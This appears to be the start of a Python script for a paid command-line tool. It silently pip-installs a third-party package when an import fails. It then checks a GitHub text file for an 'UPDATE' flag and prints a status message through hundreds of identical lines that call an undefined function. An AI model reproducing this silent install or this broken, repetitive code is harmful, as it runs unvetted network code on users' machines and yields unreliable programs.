
import sys
import subprocess
import os,requests,time
try:
    import mahdix as sifat
    import mahdix as mahdi
except:
    os.system('pip install mahdix')
    # version mahdi 0.1.3.1

def server():
    print(f'\x1b[97mCHECKING TO SERVER')
    ok = requests.get('https://raw.githubusercontent.com/reyadz/PAID-RXS/main/final_capture.txt').text
    if 'UPDATE' in ok:
    	print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
